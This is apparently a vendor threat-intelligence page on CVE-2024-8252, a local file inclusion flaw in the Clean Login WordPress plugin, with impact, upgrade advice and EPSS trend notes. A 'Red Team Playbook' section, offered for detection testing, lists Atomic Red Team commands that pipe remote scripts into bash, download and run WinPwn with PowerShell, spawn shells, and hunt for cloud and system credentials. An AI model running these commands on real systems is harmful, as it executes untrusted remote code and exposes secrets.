CVE-2024-8252
Overview
This vulnerability is a Local File Inclusion (LFI) flaw arising from insufficient validation of user-supplied input in the 'template' attribute of the clean-login-register shortcode within the Clean Login WordPress plugin. The root cause is the improper handling of file path parameters that allows inclusion of arbitrary files on the server. The affected component is the shortcode processing logic in versions up to and including 1.14.5 of the Clean Login plugin.
Vulnerability Description
The Clean Login plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.14.5 via the 'template' attribute of the clean-login-register shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
Impact
An attacker with Contributor or higher WordPress privileges can exploit this LFI vulnerability to execute arbitrary PHP code on the server by including crafted files, bypassing normal access controls. This can lead to unauthorized data access, privilege escalation, and full server compromise. Exploitation requires authenticated access but no user interaction beyond shortcode usage. The CVSS vector (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) indicates network attack with low complexity and privileges required but no user interaction, resulting in high confidentiality, integrity, and availability impacts.
Solution
Users should upgrade the Clean Login WordPress plugin to version 1.14.6 or later, where this LFI vulnerability is patched. Detailed patch information and remediation instructions are available from the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/b9f99b51-e1b1-4cd3-a9f7-24e4b59811a7. No official workarounds are documented; immediate update to the fixed version is recommended to eliminate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Clean Login plugin for WordPress is characterized by a Local File Inclusion (LFI) flaw that affects all versions up to and including 1.14.5. This issue arises from improper handling of the 'template' attribute within the clean-login-register shortcode. When an authenticated user, with Contributor-level access or higher, manipulates this attribute, they can potentially include arbitrary files from the server. This capability allows attackers to execute PHP code embedded within those files, leading to severe security implications. The flaw is particularly concerning as it does not require administrative privileges, thus broadening the attack surface to a wider range of users who may have limited access rights.
Exploitation of this vulnerability can occur through various attack vectors. An authenticated attacker can craft a malicious request that leverages the shortcode to include a file from the server's filesystem. For instance, by specifying a path to a PHP file that contains malicious code, the attacker can execute arbitrary commands on the server. This could be achieved by uploading a seemingly harmless file, such as an image, that contains PHP code, and then using the LFI vulnerability to include and execute it. Furthermore, the attacker may also leverage this flaw to read sensitive configuration files, such as wp-config.php, which could expose database credentials and other critical information.
The real-world impact of this vulnerability can be significant, especially for organizations that rely on the Clean Login plugin for user authentication. Successful exploitation could lead to unauthorized access to sensitive data, including user information and administrative functionalities. Additionally, attackers could manipulate the server environment, leading to further compromises, such as the installation of backdoors or malware. The business risks associated with such breaches include reputational damage, financial losses due to remediation efforts, and potential legal ramifications stemming from data protection regulations. Organizations may also face operational disruptions as they work to mitigate the effects of an attack.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the Clean Login plugin to the latest version is crucial, as it often includes patches for known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests that attempt to exploit the LFI flaw. Monitoring server logs for unusual access patterns or attempts to include unauthorized files can also aid in early detection of potential exploitation attempts. Furthermore, restricting user permissions and adhering to the principle of least privilege can minimize the risk of exploitation by limiting the capabilities of authenticated users.
In conclusion, the Local File Inclusion vulnerability in the Clean Login plugin poses a significant threat to WordPress installations, particularly due to its accessibility to users with lower privilege levels. The potential for unauthorized file execution and data exposure necessitates immediate attention from organizations utilizing this plugin. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, thereby enhancing their overall security posture.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the Local File Inclusion vulnerability in the Clean Login WordPress plugin. Our telemetry indicates a significant upward trend in activity, with the Exploit Prediction Scoring System (EPSS) score more than tripling, reflecting heightened attacker interest and increased likelihood of exploitation in the near term. This surge suggests that threat actors are actively probing or attempting to leverage this vulnerability, potentially to execute arbitrary PHP code via authenticated accounts with Contributor-level privileges or higher. Although no new exploit variants or publicly disclosed proof-of-concept code have emerged, the sharp increase in exploitation signals an elevated risk environment for organizations using affected plugin versions. Defenders should recognize that this vulnerability is transitioning from theoretical risk to active threat, underscoring the urgency of monitoring and response efforts. Consequently, the threat level associated with CVE-2024-8252 has intensified, warranting heightened vigilance given the expanded attack surface and the potential for privilege escalation and unauthorized code execution.
Update 2 — June 13, 2026
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-8252, rising by over 30%, despite a concurrent significant reduction in detection activity across our telemetry. This divergence suggests that while active exploitation attempts may be less frequently detected, the underlying risk and likelihood of exploitation remain elevated, potentially due to more targeted or stealthier attack methods that evade current detection mechanisms. The EPSS score now places this vulnerability near the top percentile of predicted exploitability, signaling that adversaries continue to prioritize this vector for gaining unauthorized code execution with Contributor-level access. This shift underscores a nuanced threat landscape where attackers may be refining their tactics to bypass defenses, increasing the challenge for defenders to identify and mitigate exploitation attempts promptly. Consequently, the threat level associated with CVE-2024-8252 should be considered heightened, reflecting an environment where the vulnerability is not only theoretically exploitable but increasingly leveraged in practice, necessitating enhanced monitoring and response capabilities.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Codection | Clean Login | All |
cpe:2.3:a:codection:clean_login:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
2 eventsSighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-193 | PHP Remote File Inclusion |
47%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-8252 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/b9f99b51-e1b1-4cd3-a9f7-24e4b59811a7?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/clean-login/tags/1.14.5/include/shortcodes.php#L146 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/clean-login/tags/1.14.5/include/frontend.php#L20 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3143241%40clean-login&new=3143241%40clean-login&sfp_email=&sfph_mail= |